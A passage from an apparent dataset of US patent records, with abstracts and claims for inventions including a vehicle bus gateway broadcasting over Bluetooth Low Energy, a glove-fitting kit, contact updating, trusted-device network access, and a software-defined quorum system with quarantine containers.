receiving a message from a vehicle BUS or vehicle controller; determining if a message source type and message type correspond to an element of a list of pre-designated message source types and corresponding message types; and upon determining that the message source type and message type correspond to the element, sending the message to a destination type associated with the element. 12. The method of claim 11, wherein the destination type includes a BLUETOOTH low energy (BTLE) chip and the method includes sending the message via a BTLE broadcast. 13. The method of claim 11, wherein the destination type includes a vehicle BUS or controller different from the vehicle BUS or controller from which the message was received. 14. The method of claim 11, further comprising:
generating a random key; and encrypting the message with the random key prior to sending the message. 15. The method of claim 14, further comprising:
sending the random key to a wireless device, over a wireless connection different from the destination type. 16. The method of claim 15, wherein the wireless connection includes BLUETOOTH. 17. The method of claim 15, wherein the wireless connection includes near-field communication. 18. A system comprising:
a plurality of vehicle system controllers; a gateway module; and a plurality of vehicle BUSSES connecting the system controllers to the gateway module; wherein the gateway module includes a memory storing a list of pre-approved message types and corresponding source types, and wherein the gateway module includes a processor configured to receive a message from one of the vehicle controllers over one of the vehicle BUSSES, to determine if a message type and source type of the received message matches an element of the list; and to deliver the message to a destination associated with the element which the message type and source type matches. 19. The system of claim 18, wherein the destination includes a BLUETOOTH low energy chip and wherein the processor is configured to deliver the message through a broadcast from the BLUETOOTH low energy chip. 20. The system of claim 18, wherein the processor is further configured to generate a random key, encrypt the message with the random key, and deliver the random key to a wireless device over a wireless connection established between the wireless device and the gateway module. | A system includes a processor configured to wirelessly broadcast a message obtained from a first originating vehicle BUS or controller, following a determination that the message was on a pre-approved list for broadcast and having encrypted the message utilizing a temporary random key generated for a message session. The system may include vehicle controllers, a gateway module, and vehicle BUSSES connecting the system controllers to the gateway module. The gateway module may include a memory storing a list of pre-approved message types and corresponding source types, and a processor configured to receive a message from one of the vehicle controllers over one of the vehicle BUSSES to determine if a message type and source type of the received message matches an element of the list.1. A system comprising:
a processor configured to: wirelessly broadcast a message obtained from a first originating vehicle BUS or controller, following a determination that the message was on a pre-approved list for broadcast and having encrypted the message utilizing a temporary random key generated for a message session. 2. The system of claim 1, wherein the message session comprises a single ignition cycle. 3. The system of claim 1, wherein the pre-approved list includes a designation of a message type and a source type which the processor determines match characteristics of the message prior to broadcast. 4. The system of claim 3, wherein the source type includes a first specific vehicle BUS. 5. The system of claim 3, wherein the source type includes a first specific vehicle controller. 6. The system of claim 3, wherein the pre-approved list includes a designation of destination in conjunction with the message type and source type, and wherein the broadcast includes delivery of the message to the designated destination. 7. The system of claim 6, wherein the destination is a second specific vehicle BUS or controller different from the first originating vehicle BUS or controller. 8. The system of claim 1, wherein the message is broadcast via a BLUETOOTH low energy transceiver. 9. The system of claim 1, wherein the processor is configured to deliver the temporary random key to a wireless device via a wireless connection different from a wireless connection used to wirelessly broadcast the message. 10. The system of claim 9, wherein the processor is configured to receive a request to engage a read/write mode, from an application pre-approved to request read/write, executing on the wireless device. 11. A computer implemented method comprising:
receiving a message from a vehicle BUS or vehicle controller; determining if a message source type and message type correspond to an element of a list of pre-designated message source types and corresponding message types; and upon determining that the message source type and message type correspond to the element, sending the message to a destination type associated with the element. 12. The method of claim 11, wherein the destination type includes a BLUETOOTH low energy (BTLE) chip and the method includes sending the message via a BTLE broadcast. 13. The method of claim 11, wherein the destination type includes a vehicle BUS or controller different from the vehicle BUS or controller from which the message was received. 14. The method of claim 11, further comprising:
generating a random key; and encrypting the message with the random key prior to sending the message. 15. The method of claim 14, further comprising:
sending the random key to a wireless device, over a wireless connection different from the destination type. 16. The method of claim 15, wherein the wireless connection includes BLUETOOTH. 17. The method of claim 15, wherein the wireless connection includes near-field communication. 18. A system comprising:
a plurality of vehicle system controllers; a gateway module; and a plurality of vehicle BUSSES connecting the system controllers to the gateway module; wherein the gateway module includes a memory storing a list of pre-approved message types and corresponding source types, and wherein the gateway module includes a processor configured to receive a message from one of the vehicle controllers over one of the vehicle BUSSES, to determine if a message type and source type of the received message matches an element of the list; and to deliver the message to a destination associated with the element which the message type and source type matches. 19. The system of claim 18, wherein the destination includes a BLUETOOTH low energy chip and wherein the processor is configured to deliver the message through a broadcast from the BLUETOOTH low energy chip. 20. The system of claim 18, wherein the processor is further configured to generate a random key, encrypt the message with the random key, and deliver the random key to a wireless device over a wireless connection established between the wireless device and the gateway module. | 2,400 |
9,180 | 9,180 | 15,004,229 | 2,483 | A kit to facilitate identifying at least one glove particularly suitable to be worn by a particular individual includes a backdrop having at least two visually-discernible calibration marks disposed thereon, a camera, a memory having stored therein characterizing parameters for a variety of different gloves, and a control circuit that operably couples to the latter. The control circuit presents to a kit user via a display an image of the particular individual's hand as placed on the backdrop, and then presents a plurality of user-placeable markers by which the kit user marks particular locations of the particular individual's hand. The control circuit then processes the image of the particular individual's hand as marked by the kit user and as a function of the two visually-discernible calibration marks to identify at least one glove that is particularly suitable to be worn by the particular individual. | 1. A kit to facilitate identifying at least one glove particularly suitable to be worn by a particular individual, the kit comprising:
a backdrop sized and configured to have a hand of the particular individual placed thereupon and further having at least two visually-discernable calibration marks disposed thereon; a camera; a memory having stored therein characterizing parameters for each of a variety of different gloves; a control circuit operably coupled to the memory and to the camera and configured to:
present to a kit user via a display an image of the particular individual's hand as placed on the backdrop;
present to the kit user via the display a plurality of user-placeable markers by which the kit user marks particular locations of the particular individual's hand;
process the image of the particular individual's hand as marked by the kit user and as a function of the two visually-discernable calibration marks to identify at least one glove that is particularly suitable to be worn by the particular individual. 2. The kit of claim 1 wherein the backdrop comprises a disposable sheet. 3. The kit of claim 1 wherein the backdrop has at least an outline of a human hand disposed thereon to serve as a hand-placement locator for the particular individual. 4. The kit of claim 3 wherein the at least two visually-discernable calibration marks are each disposed on an opposite side of the hand-placement locator. 5. The kit of claim 1 wherein control circuit, memory, and camera comprise integral parts of a shared platform. 6. The kit of claim 1 wherein the characterizing parameters for each of a variety of different gloves include at least some parameters selected from the group of parameters comprising:
glove size;
glove material;
glove material texture;
glove material thickness; and
additives. 7. The kit of claim 1 wherein the control circuit is further configured, while processing the image of the particular individual's hand as marked by the kit user and as a function of the two visually-discernable calibration marks to identify at least one glove that is particularly suitable to be worn by the particular individual, and via the display, to present an animated image of a hand-scanning process. 8. The kit of claim 1 wherein the particular locations of the particular individual's hand that the kit user is to mark with the user-placeable markers include tips of the digits of the particular individual's hand. 9. The kit of claim 8 wherein the particular locations of the particular individual's hand that the kit user is to mark with the user-placeable markers further include areas between the digits of the particular individual's hand. 10. The kit of claim 9 wherein the particular locations of the particular individual's hand that the kit user is to mark with the user-placeable markers further include the width of the palm as corresponds to the particular individual's hand. 11. The kit of claim 1 wherein the memory has further stored therein at least one glove preference as corresponds to the particular individual, and wherein the control circuit is further configured to identify the at least one glove that is particularly suitable to be worn by the particular individual as a function of the at least one glove preference. 12. The kit of claim 11 wherein the at least one glove preference comprises a preference with respect to at least one of:
a glove material;
a glove texture;
double gloving;
glove material thickness; and
a glove additive. 13. The kit of claim 1 wherein the control circuit is further configured to identify at least two different gloves that are particularly suitable to be worn by the particular individual. 14. The kit of claim 13 wherein the control circuit is further configured to present, via the display, the at least two different gloves that are particularly suitable to be worn by the particular individual. 15. The kit of claim 14 wherein the control circuit is further configured to present the at least two different gloves in a prioritized order such that a most suitable glove is presented first. 16. The kit of claim 14 wherein the control circuit is further configured to present a recommended glove size with each of the at least two different gloves. 17. The kit of claim 1 wherein the control circuit is further configured to provide the kit user with an opportunity to specify the different gloves that are available for the control circuit to consider when identifying the at least one glove that is particularly suitable to be worn by the particular individual. | A kit to facilitate identifying at least one glove particularly suitable to be worn by a particular individual includes a backdrop having at least two visually-discernible calibration marks disposed thereon, a camera, a memory having stored therein characterizing parameters for a variety of different gloves, and a control circuit that operably couples to the latter. The control circuit presents to a kit user via a display an image of the particular individual's hand as placed on the backdrop, and then presents a plurality of user-placeable markers by which the kit user marks particular locations of the particular individual's hand. The control circuit then processes the image of the particular individual's hand as marked by the kit user and as a function of the two visually-discernible calibration marks to identify at least one glove that is particularly suitable to be worn by the particular individual.1. A kit to facilitate identifying at least one glove particularly suitable to be worn by a particular individual, the kit comprising:
a backdrop sized and configured to have a hand of the particular individual placed thereupon and further having at least two visually-discernable calibration marks disposed thereon; a camera; a memory having stored therein characterizing parameters for each of a variety of different gloves; a control circuit operably coupled to the memory and to the camera and configured to:
present to a kit user via a display an image of the particular individual's hand as placed on the backdrop;
present to the kit user via the display a plurality of user-placeable markers by which the kit user marks particular locations of the particular individual's hand;
process the image of the particular individual's hand as marked by the kit user and as a function of the two visually-discernable calibration marks to identify at least one glove that is particularly suitable to be worn by the particular individual. 2. The kit of claim 1 wherein the backdrop comprises a disposable sheet. 3. The kit of claim 1 wherein the backdrop has at least an outline of a human hand disposed thereon to serve as a hand-placement locator for the particular individual. 4. The kit of claim 3 wherein the at least two visually-discernable calibration marks are each disposed on an opposite side of the hand-placement locator. 5. The kit of claim 1 wherein control circuit, memory, and camera comprise integral parts of a shared platform. 6. The kit of claim 1 wherein the characterizing parameters for each of a variety of different gloves include at least some parameters selected from the group of parameters comprising:
glove size;
glove material;
glove material texture;
glove material thickness; and
additives. 7. The kit of claim 1 wherein the control circuit is further configured, while processing the image of the particular individual's hand as marked by the kit user and as a function of the two visually-discernable calibration marks to identify at least one glove that is particularly suitable to be worn by the particular individual, and via the display, to present an animated image of a hand-scanning process. 8. The kit of claim 1 wherein the particular locations of the particular individual's hand that the kit user is to mark with the user-placeable markers include tips of the digits of the particular individual's hand. 9. The kit of claim 8 wherein the particular locations of the particular individual's hand that the kit user is to mark with the user-placeable markers further include areas between the digits of the particular individual's hand. 10. The kit of claim 9 wherein the particular locations of the particular individual's hand that the kit user is to mark with the user-placeable markers further include the width of the palm as corresponds to the particular individual's hand. 11. The kit of claim 1 wherein the memory has further stored therein at least one glove preference as corresponds to the particular individual, and wherein the control circuit is further configured to identify the at least one glove that is particularly suitable to be worn by the particular individual as a function of the at least one glove preference. 12. The kit of claim 11 wherein the at least one glove preference comprises a preference with respect to at least one of:
a glove material;
a glove texture;
double gloving;
glove material thickness; and
a glove additive. 13. The kit of claim 1 wherein the control circuit is further configured to identify at least two different gloves that are particularly suitable to be worn by the particular individual. 14. The kit of claim 13 wherein the control circuit is further configured to present, via the display, the at least two different gloves that are particularly suitable to be worn by the particular individual. 15. The kit of claim 14 wherein the control circuit is further configured to present the at least two different gloves in a prioritized order such that a most suitable glove is presented first. 16. The kit of claim 14 wherein the control circuit is further configured to present a recommended glove size with each of the at least two different gloves. 17. The kit of claim 1 wherein the control circuit is further configured to provide the kit user with an opportunity to specify the different gloves that are available for the control circuit to consider when identifying the at least one glove that is particularly suitable to be worn by the particular individual. | 2,400 |
9,181 | 9,181 | 14,572,449 | 2,451 | Methods, devices and program products are provided to track communications event (CE) identifiers associated with the communications events for a device. The method determines whether communications events are associated with a common CE identifier, and performs a contact update utilizing content from at least one communications event associated with the common CE identifier to update a contact. The device comprises a processor, a user interface, and a local storage medium. The device determines whether communications events are associated with a common CE identifier and performs a contact update utilizing content from at least one of the communications events associated with the common CE identifier to update the contact. The computer program product comprises a non-signal computer readable storage medium comprising computer executable code to track CE identifiers associated with the communications events for a device and a contact update. | 1. A method, comprising:
tracking communications event (CE) identifiers associated with the communications events for a device; determining whether a select number of communications events are associated with a common CE identifier; and performing a contact update based on the determining, the contact update utilizing content from at least one of the communications events associated with the common CE identifier to update a contact. 2. The method of claim 1, wherein the performing includes generating the contact as a temporary contact on the device based on the content of the communications events associated with the common CE identifier. 3. The method of claim 1, further comprising presenting an update-contact option, through a user interface of the device, to perform the contact update. 4. The method of claim 1, further comprising presenting an update-contact option, through a user interface of the device, to modify an existing contact based on the determining. 5. The method of claim 1, wherein the CE identifiers indicate a source for communications events received by the device and a destination for communications events sent from the device. 6. The method of claim 1, further comprising presenting a temporary contact option, through the user interface of the device, to designate the contact as a temporary contact; and automatically deleting the temporary contact after an occurrence of a term indicator, the term indicator representing a predetermined amount of time passing without using the temporary contact. 7. The method of claim 1, further comprising storing the content in a local storage medium local to the device; and deleting the content, from the local storage medium, based on a term indicator. 8. The method of claim 7, wherein the indicator includes a lifetime marker, the method further comprising deleting the temporary contact, from the local storage medium, after expiration of the lifetime marker. 9. The method of claim 1, wherein the content is content selected from to group consisting of incoming communications content received by a device and outgoing communications content sent from the device. 10. The method of claim 1, wherein the performing comprises analyzing the content to identify content selected from the group consisting of a telephone number, email address, home address, business address, and name associated with the communications event. 11. A device, comprising:
a processor; a user interface generated via the processor; a local storage medium storing program instructions accessible by the processor; wherein, responsive to execution of the program instructions, the processor:
tracks communications event (CE) identifiers associated with the communications events;
determines whether a select number of communications events are associated with a common CE identifier; and
performs a contact update based on the operation, the contact update utilizing content from at least one of the communications events associated with the common CE identifier to update a contact. 12. The device of claim 11, wherein the local storage medium stores a CE identification log including the CE identifiers and a count of a number of communications events that are tracked that are associated with the CE identifiers. 13. The device of claim 11, wherein the processor generates, as the contact update, a temporary contact saved in the local storage medium based on the content of the communications events associated with the common CE identifier. 14. The device of claim 11, wherein the CE identifiers indicate a source for communications events received by the device and a destination for communications events sent from the device. 15. The device of claim 11, wherein the user interface presents a temporary contact option to designate the contact as a temporary contact. 16. The device of claim 15, wherein the processor automatically deletes the temporary contact after an occurrence of a term indicator, the term indicator representing a predetermined amount of time passing without using the temporary contact. 17. The device of claim 11, wherein the local storage medium stores the contact and the processor deletes the content, from the local storage medium, based on a term indicator. 18. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to perform:
track communications event (CE) identifiers associated with the communications events for a device; determine whether a select number of communications events are associated with a common CE identifier; and perform a contact update based on the determining, the contact update utilizing content from at least one of the communications events associated with the common CE identifier to update a contact. 19. The computer program product of claim 18, further comprising a temporary contact generated based on the content of at least one of the communications events associated with the common CE identifier. 20. The computer program product of claim 17, further comprising a CE identification log storing the CE identifiers and a count of a number of communications events that are tracked that are associated with the CE identifiers. | Methods, devices and program products are provided to track communications event (CE) identifiers associated with the communications events for a device. The method determines whether communications events are associated with a common CE identifier, and performs a contact update utilizing content from at least one communications event associated with the common CE identifier to update a contact. The device comprises a processor, a user interface, and a local storage medium. The device determines whether communications events are associated with a common CE identifier and performs a contact update utilizing content from at least one of the communications events associated with the common CE identifier to update the contact. The computer program product comprises a non-signal computer readable storage medium comprising computer executable code to track CE identifiers associated with the communications events for a device and a contact update.1. A method, comprising:
tracking communications event (CE) identifiers associated with the communications events for a device; determining whether a select number of communications events are associated with a common CE identifier; and performing a contact update based on the determining, the contact update utilizing content from at least one of the communications events associated with the common CE identifier to update a contact. 2. The method of claim 1, wherein the performing includes generating the contact as a temporary contact on the device based on the content of the communications events associated with the common CE identifier. 3. The method of claim 1, further comprising presenting an update-contact option, through a user interface of the device, to perform the contact update. 4. The method of claim 1, further comprising presenting an update-contact option, through a user interface of the device, to modify an existing contact based on the determining. 5. The method of claim 1, wherein the CE identifiers indicate a source for communications events received by the device and a destination for communications events sent from the device. 6. The method of claim 1, further comprising presenting a temporary contact option, through the user interface of the device, to designate the contact as a temporary contact; and automatically deleting the temporary contact after an occurrence of a term indicator, the term indicator representing a predetermined amount of time passing without using the temporary contact. 7. The method of claim 1, further comprising storing the content in a local storage medium local to the device; and deleting the content, from the local storage medium, based on a term indicator. 8. The method of claim 7, wherein the indicator includes a lifetime marker, the method further comprising deleting the temporary contact, from the local storage medium, after expiration of the lifetime marker. 9. The method of claim 1, wherein the content is content selected from to group consisting of incoming communications content received by a device and outgoing communications content sent from the device. 10. The method of claim 1, wherein the performing comprises analyzing the content to identify content selected from the group consisting of a telephone number, email address, home address, business address, and name associated with the communications event. 11. A device, comprising:
a processor; a user interface generated via the processor; a local storage medium storing program instructions accessible by the processor; wherein, responsive to execution of the program instructions, the processor:
tracks communications event (CE) identifiers associated with the communications events;
determines whether a select number of communications events are associated with a common CE identifier; and
performs a contact update based on the operation, the contact update utilizing content from at least one of the communications events associated with the common CE identifier to update a contact. 12. The device of claim 11, wherein the local storage medium stores a CE identification log including the CE identifiers and a count of a number of communications events that are tracked that are associated with the CE identifiers. 13. The device of claim 11, wherein the processor generates, as the contact update, a temporary contact saved in the local storage medium based on the content of the communications events associated with the common CE identifier. 14. The device of claim 11, wherein the CE identifiers indicate a source for communications events received by the device and a destination for communications events sent from the device. 15. The device of claim 11, wherein the user interface presents a temporary contact option to designate the contact as a temporary contact. 16. The device of claim 15, wherein the processor automatically deletes the temporary contact after an occurrence of a term indicator, the term indicator representing a predetermined amount of time passing without using the temporary contact. 17. The device of claim 11, wherein the local storage medium stores the contact and the processor deletes the content, from the local storage medium, based on a term indicator. 18. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to perform:
track communications event (CE) identifiers associated with the communications events for a device; determine whether a select number of communications events are associated with a common CE identifier; and perform a contact update based on the determining, the contact update utilizing content from at least one of the communications events associated with the common CE identifier to update a contact. 19. The computer program product of claim 18, further comprising a temporary contact generated based on the content of at least one of the communications events associated with the common CE identifier. 20. The computer program product of claim 17, further comprising a CE identification log storing the CE identifiers and a count of a number of communications events that are tracked that are associated with the CE identifiers. | 2,400 |
9,182 | 9,182 | 14,921,644 | 2,431 | Methods and systems are disclosed to enable a user device to gain access to a network via a trusted device (e.g., a network device). The network device can obtain a user device identifier from the user device and can transmit the user device identifier along with a network device identifier to a computing device (e.g., a server associated with a service provider). The server can determine if the user device should be permitted to access the network. The server can return the results of the determination to the network device and/or the user device. If the determination is that the user device should be permitted to access the network, the user device can also receive network credentials. The user device can access the network with the network credentials. | 1. A method comprising:
receiving, by a first computing device, a second identifier associated with a second computing device, wherein the first computing device is associated with a first identifier, wherein the first computing device is connected to a first network, and wherein the reception of the second identifier indicates the second computing device is proximate to the first computing device; transmitting the first identifier and the second identifier to a third computing device, wherein a location of the first computing device is known to the third computing device, and wherein the first computing device is trusted by the third computing device; receiving an authentication message from the third computing device; transmitting a network credential for network access to the second computing device in response to the authentication message; and authenticating the second computing device, wherein the authentication is based on the network credential, and wherein the authentication allows the second computing device to connect to the first network. 2. The method of claim 1, further comprising providing, to the second computing device, network access based on the network credential. 3. The method of claim 2, wherein the network access comprises access to the first network. 4. The method of claim 2, wherein the network access comprises access to a second network. 5. The method of claim 1, wherein the second identifier comprises a media access control (MAC) address. 6. The method of claim 1, wherein the second identifier is associated with subscription information. 7. The method of claim 1, further comprising:
causing a display device to prompt a user for feedback; receiving feedback from the user; and wherein the transmitting the network credential for network access to the second computing device based on the authorization message comprises transmitting the network credential based on the received feedback. 8. A method comprising:
transmitting, by a first computing device, a first identifier to a second computing device via a first messaging protocol, wherein the first identifier is associated with the first computing device, wherein transmission via the first messaging protocol indicates proximity to the second computing device, wherein the second computing device is associated with a second identifier, wherein the second computing device is connected to a network, wherein the second computing device transmits the first identifier and the second identifier to a third computing device via a second messaging protocol, wherein the location of the second computing device is known by the third computing device, and wherein the second computing device is trusted by the third computing device; receiving a network credential from the third computing device; transmitting the network credential to the second computing device; and accessing the network through the second computing device, wherein the access is based on the network credential. 9. The method of claim 8, further comprising communicating via the second messaging protocol through the accessed network. 10. The method of claim 8, wherein the accessed network is different from a network accessed by a fourth computing device, wherein the fourth computing device is in association with the second computing device. 11. The method of claim 8, wherein the first messaging protocol comprises a protocol complying with a Bluetooth standard. 12. The method of claim 8, wherein the second messaging protocol comprises a protocol complying with a Wi-Fi standard. 13. The method of claim 8, wherein the network credential is based on subscription information associated with the first computing device. 14. The method of claim 8, wherein the second computing device is a set-top box. 15. The method of claim 8, wherein the first computing device is a smart phone. 16. A method comprising:
receiving, by a first computing device, a first identifier and a second identifier from a second computing device, wherein the first identifier is associated with the second computing device, wherein the second identifier is associated with a third computing device, wherein the reception of the first identifier and the second identifier indicates that the second computing device is proximate to the third computing device, wherein the second computing device is connected to a network, wherein the location of the second computing device is known by the first computing device, and wherein the second computing device is trusted by the first computing device; determining whether the second identifier is associated with an authorized device; and responsive to a determination that the second identifier is associated with an authorized device, transmitting an authentication message, wherein the authentication message comprises instructions to allow the third computing device to associate with the second computing device. 17. The method of claim 16, wherein the second identifier comprises a MAC address. 18. The method of claim 16, wherein determining whether the second identifier is associated with an authorized device further comprises retrieving subscription information associated with the second identifier. 19. The method of claim 16, further comprising causing a display device to prompt a user for a selection of a plurality of options for an access decision for the third computing device. 20. The method of claim 19, wherein the plurality of options comprise at least one of deny, allow, and allow with limited access. | Methods and systems are disclosed to enable a user device to gain access to a network via a trusted device (e.g., a network device). The network device can obtain a user device identifier from the user device and can transmit the user device identifier along with a network device identifier to a computing device (e.g., a server associated with a service provider). The server can determine if the user device should be permitted to access the network. The server can return the results of the determination to the network device and/or the user device. If the determination is that the user device should be permitted to access the network, the user device can also receive network credentials. The user device can access the network with the network credentials.1. A method comprising:
receiving, by a first computing device, a second identifier associated with a second computing device, wherein the first computing device is associated with a first identifier, wherein the first computing device is connected to a first network, and wherein the reception of the second identifier indicates the second computing device is proximate to the first computing device; transmitting the first identifier and the second identifier to a third computing device, wherein a location of the first computing device is known to the third computing device, and wherein the first computing device is trusted by the third computing device; receiving an authentication message from the third computing device; transmitting a network credential for network access to the second computing device in response to the authentication message; and authenticating the second computing device, wherein the authentication is based on the network credential, and wherein the authentication allows the second computing device to connect to the first network. 2. The method of claim 1, further comprising providing, to the second computing device, network access based on the network credential. 3. The method of claim 2, wherein the network access comprises access to the first network. 4. The method of claim 2, wherein the network access comprises access to a second network. 5. The method of claim 1, wherein the second identifier comprises a media access control (MAC) address. 6. The method of claim 1, wherein the second identifier is associated with subscription information. 7. The method of claim 1, further comprising:
causing a display device to prompt a user for feedback; receiving feedback from the user; and wherein the transmitting the network credential for network access to the second computing device based on the authorization message comprises transmitting the network credential based on the received feedback. 8. A method comprising:
transmitting, by a first computing device, a first identifier to a second computing device via a first messaging protocol, wherein the first identifier is associated with the first computing device, wherein transmission via the first messaging protocol indicates proximity to the second computing device, wherein the second computing device is associated with a second identifier, wherein the second computing device is connected to a network, wherein the second computing device transmits the first identifier and the second identifier to a third computing device via a second messaging protocol, wherein the location of the second computing device is known by the third computing device, and wherein the second computing device is trusted by the third computing device; receiving a network credential from the third computing device; transmitting the network credential to the second computing device; and accessing the network through the second computing device, wherein the access is based on the network credential. 9. The method of claim 8, further comprising communicating via the second messaging protocol through the accessed network. 10. The method of claim 8, wherein the accessed network is different from a network accessed by a fourth computing device, wherein the fourth computing device is in association with the second computing device. 11. The method of claim 8, wherein the first messaging protocol comprises a protocol complying with a Bluetooth standard. 12. The method of claim 8, wherein the second messaging protocol comprises a protocol complying with a Wi-Fi standard. 13. The method of claim 8, wherein the network credential is based on subscription information associated with the first computing device. 14. The method of claim 8, wherein the second computing device is a set-top box. 15. The method of claim 8, wherein the first computing device is a smart phone. 16. A method comprising:
receiving, by a first computing device, a first identifier and a second identifier from a second computing device, wherein the first identifier is associated with the second computing device, wherein the second identifier is associated with a third computing device, wherein the reception of the first identifier and the second identifier indicates that the second computing device is proximate to the third computing device, wherein the second computing device is connected to a network, wherein the location of the second computing device is known by the first computing device, and wherein the second computing device is trusted by the first computing device; determining whether the second identifier is associated with an authorized device; and responsive to a determination that the second identifier is associated with an authorized device, transmitting an authentication message, wherein the authentication message comprises instructions to allow the third computing device to associate with the second computing device. 17. The method of claim 16, wherein the second identifier comprises a MAC address. 18. The method of claim 16, wherein determining whether the second identifier is associated with an authorized device further comprises retrieving subscription information associated with the second identifier. 19. The method of claim 16, further comprising causing a display device to prompt a user for a selection of a plurality of options for an access decision for the third computing device. 20. The method of claim 19, wherein the plurality of options comprise at least one of deny, allow, and allow with limited access. | 2,400 |
9,183 | 9,183 | 15,596,363 | 2,494 | A Software Defined Quorum (SDQ) system implements a quorum system using Software Defined Networking (SDN). The SDQ system includes a controller/orchestrator; a plurality of compute/storage devices each comprising a normal container and a quarantine container; and a network communicatively coupling the controller/orchestrator and the plurality of compute/storage devices together; wherein the controller/orchestrator is configured to classify content in the quorum system based on policy attributes, address content to the plurality of compute/storage devices using a service tag based on networking attributes for the network, and address the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. | 1. A Software Defined Quorum (SDQ) system configured to implement a quorum system using Software Defined Networking (SDN), the SDQ system comprising:
a controller/orchestrator; a plurality of compute/storage devices each comprising a normal container and a quarantine container; and a network communicatively coupling the controller/orchestrator and the plurality of compute/storage devices together; wherein the controller/orchestrator is configured to
classify content in the quorum system based on policy attributes,
address content to the plurality of compute/storage devices using a service tag based on networking attributes for the network, and
address the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. 2. The SDQ system of claim 1, wherein the network comprises a leaf/spine network with a programmable data plane using SDN, and wherein the plurality of compute/storage devices each implement a Virtual Machine (VM) which hosts the normal container and the quarantine container. 3. The SDQ system of claim 1, wherein the service tag is a Service Virtual Local Area Network Identifier (SVID), and wherein the first customer tag and the second customer tag are each a different Customer Virtual Local Area Network Identifier (CVID). 4. The SDQ system of claim 1, wherein the policy attributes are defined by a tenant and determine content type and whether modification is allowed, whether encryption is allowed, whether sampling is allowed for reporting, and associated actions. 5. The SDQ system of claim 1, wherein, to add a new tenant to the quorum system, the controller/orchestrator is configured to
receive the policy attributes from the new tenant, allocate the service tag, the first customer tag, and the second tag for the new tenant, and create the normal container and the quarantine container on each of the plurality of compute/storage devices. 6. The SDQ system of claim 1, wherein, to classify the content, the controller/orchestrator is configured to
maintain a journal for the content correlating a unique identifier, a tenant, content type, a current customer tag comprising one of the first customer tag and the second customer tag, and update or populate the journal based on the policy attributes for the tenant. 7. The SDQ system of claim 1, wherein, for suspicious content, the controller/orchestrator is configured to
address the suspicious content with the second customer tag to the quarantine container on each of the plurality of compute/storage devices, and one or more of report the suspicious content and provide a sample of the suspicious content for threat intelligence. 8. A controller/orchestrator part of a Software Defined Quorum (SDQ) system configured to implement a quorum system using Software Defined Networking (SDN), the controller/orchestrator comprising:
a network interface communicatively coupled to a network which connects to a plurality of compute/storage devices each comprising a normal container and a quarantine container; one or more processors communicatively coupled to the network interface; and memory storing instructions that, when executed, cause the one or more processors to
classify content in the quorum system based on policy attributes,
address content to the plurality of compute/storage devices using a service tag based on networking attributes for the network, and
address the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. 9. The controller/orchestrator of claim 8, wherein the network comprises a leaf/spine network with a programmable data plane using SDN, and wherein the plurality of compute/storage devices each implement a Virtual Machine (VM) which hosts the normal container and the quarantine container. 10. The controller/orchestrator of claim 8, wherein the service tag is a Service Virtual Local Area Network Identifier (SVID), and wherein the first customer tag and the second customer tag are each a different Customer Virtual Local Area Network Identifier (CVID). 11. The controller/orchestrator of claim 8, wherein the policy attributes are defined by a tenant and determine content type and whether modification is allowed, whether encryption is allowed, whether sampling is allowed for reporting, and associated actions. 12. The controller/orchestrator of claim 8, wherein, to add a new tenant to the quorum system, the memory storing instructions that, when executed, further cause the one or more processors to
receive the policy attributes from the new tenant, allocate the service tag, the first customer tag, and the second tag for the new tenant, and create the normal container and the quarantine container on each of the plurality of compute/storage devices. 13. The controller/orchestrator of claim 8, wherein, to classify the content, the memory storing instructions that, when executed, further cause the one or more processors to
maintain a journal for the content correlating a unique identifier, a tenant, content type, a current customer tag comprising one of the first customer tag and the second customer tag, and update or populate the journal based on the policy attributes for the tenant. 14. The controller/orchestrator of claim 8, wherein, for suspicious content, the memory storing instructions that, when executed, further cause the one or more processors to
address the suspicious content with the second customer tag to the quarantine container on each of the plurality of compute/storage devices, and one or more of report the suspicious content and provide a sample of the suspicious content for threat intelligence. 15. A Software Defined Quorum (SDQ) method implemented by a controller/orchestrator using Software Defined Networking (SDN), wherein the controller/orchestrator is communicatively coupled to a plurality compute/storage devices and each comprising a normal container and a quarantine container, the SDQ method comprising:
classifying content in the quorum system based on policy attributes; addressing content to the plurality of compute/storage devices using a service tag based on networking attributes for the network; and addressing the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. 16. The SDQ method of claim 15, wherein the service tag is a Service Virtual Local Area Network Identifier (SVID), and wherein the first customer tag and the second customer tag are each a different Customer Virtual Local Area Network Identifier (CVID). 17. The SDQ method of claim 15, wherein the policy attributes are defined by a tenant and determine content type and whether modification is allowed, whether encryption is allowed, whether sampling is allowed for reporting, and associated actions. 18. The SDQ method of claim 15, wherein, to add a new tenant to the quorum system, the SDQ method further comprising:
receiving the policy attributes from the new tenant; allocating the service tag, the first customer tag, and the second tag for the new tenant; and creating the normal container and the quarantine container on each of the plurality of compute/storage devices. 19. The SDQ method of claim 15, wherein, to classify the content, the SDQ method further comprising:
maintaining a journal for the content correlating a unique identifier, a tenant, content type, a current customer tag comprising one of the first customer tag and the second customer tag, and updating or populating the journal based on the policy attributes for the tenant. 20. The SDQ method of claim 15, wherein, for suspicious content, the SDQ method further comprising:
addressing the suspicious content with the second customer tag to the quarantine container on each of the plurality of compute/storage devices, and one or more of reporting the suspicious content and providing a sample of the suspicious content for threat intelligence. | A Software Defined Quorum (SDQ) system implements a quorum system using Software Defined Networking (SDN). The SDQ system includes a controller/orchestrator; a plurality of compute/storage devices each comprising a normal container and a quarantine container; and a network communicatively coupling the controller/orchestrator and the plurality of compute/storage devices together; wherein the controller/orchestrator is configured to classify content in the quorum system based on policy attributes, address content to the plurality of compute/storage devices using a service tag based on networking attributes for the network, and address the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes.1. A Software Defined Quorum (SDQ) system configured to implement a quorum system using Software Defined Networking (SDN), the SDQ system comprising:
a controller/orchestrator; a plurality of compute/storage devices each comprising a normal container and a quarantine container; and a network communicatively coupling the controller/orchestrator and the plurality of compute/storage devices together; wherein the controller/orchestrator is configured to
classify content in the quorum system based on policy attributes,
